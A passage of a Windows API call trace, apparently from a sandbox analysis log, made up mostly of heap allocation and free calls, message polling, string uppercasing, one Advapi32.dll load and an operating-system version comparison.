hHeap=0x25c0000) returned 1 [0262.145] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0262.147] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0262.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0262.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0262.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.148] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0262.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.149] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.149] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.149] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0262.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1778 [0262.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0262.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0262.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.150] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0262.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.151] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0262.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0262.151] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0262.152] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.152] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0262.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.153] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0262.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.155] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0262.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0262.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0262.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.156] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0262.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0262.157] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0262.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0262.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0262.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0262.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0262.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.160] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.161] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0262.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0262.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.161] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0262.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.162] CharUpperBuffW (in: 